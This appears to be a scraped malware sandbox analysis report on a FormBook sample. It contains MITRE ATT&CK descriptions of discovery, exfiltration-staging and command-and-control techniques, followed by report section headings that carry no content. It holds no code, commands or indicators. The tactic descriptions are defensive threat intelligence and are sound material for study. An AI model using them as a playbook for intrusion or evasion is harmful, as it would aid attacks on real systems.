Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 00098765123POIIU.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers